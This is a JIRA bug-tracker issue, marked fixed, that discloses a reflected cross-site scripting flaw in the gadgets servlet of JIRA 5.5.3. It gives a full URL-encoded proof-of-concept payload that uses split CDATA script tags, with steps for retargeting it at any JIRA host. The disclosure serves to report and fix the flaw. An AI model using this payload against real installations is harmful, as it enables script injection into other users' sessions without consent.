Details
-
Bug
-
Resolution: Fixed
-
High
-
5.5.3
-
7.5
-
Description
Steps to recreate:
1. To view the reflected XSS affecting JIRA, present on the current JIRA installation (jira.atlassian.com) visit the following link:
https://jira.atlassian.com/plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22+%3F%3E%3CModule%3E%3CModulePrefs+title%3D%22Location+Map%22+height%3D%22300%22%0D%0Aauthor%3D%22a%22+author_email%3D%22a%22+%2F%3E%3CUserPref+name%3D%22lat%22+display_name%3D%22Latitude%22+required%3D%22true%22+%2F%3E%3CUserPref+name%3D%22lng%22+display_name%3D%22Longitude%22+required%3D%22true%22+%2F%3E%3CContent+type%3D%22html%22%3E%3C![CDATA[%3C]]%3Escript%3C![CDATA[%3E]]%3Ealert%28document.domain%29%3C![CDATA[%3C]]%3E/script%3C![CDATA[%3E]]%3E%3C%2FContent%3E%3C%2FModule%3E&url=https%3A%2F%2Fjira.atlassian.com%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml
2. To perform the reflected XSS attack on any JIRA installation (not sure how far this issue dates back to), replace the host (jira.atlassian.com, found on later in the URL) with the one you wish to test on, and append the path to the base JIRA directory.
/plugins/servlet/gadgets/ifr?rawxml=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22UTF-8%22+%3F%3E%3CModule%3E%3CModulePrefs+title%3D%22Location+Map%22+height%3D%22300%22%0D%0Aauthor%3D%22a%22+author_email%3D%22a%22+%2F%3E%3CUserPref+name%3D%22lat%22+display_name%3D%22Latitude%22+required%3D%22true%22+%2F%3E%3CUserPref+name%3D%22lng%22+display_name%3D%22Longitude%22+required%3D%22true%22+%2F%3E%3CContent+type%3D%22html%22%3E%3C![CDATA[%3C]]%3Escript%3C![CDATA[%3E]]%3Ealert%28document.domain%29%3C![CDATA[%3C]]%3E/script%3C![CDATA[%3E]]%3E%3C%2FContent%3E%3C%2FModule%3E&url=https%3A%2F%2Fjira.atlassian.com%2Frest%2Fgadgets%2F1.0%2Fg%2Fcom.atlassian.jira.gadgets%3Aintroduction-gadget%2Fgadgets%2Fintroduction-gadget.xml
Note: This XSS requires no user interaction, or authentication.
The original reporter of this vulnerability is Nir Goldshlager ngoldshlager@salesforce.com.
Attachments
Issue Links
- is cloned from
-
JRACLOUD-66366 Reflected XSS affecting JIRA via Gadgets
- Closed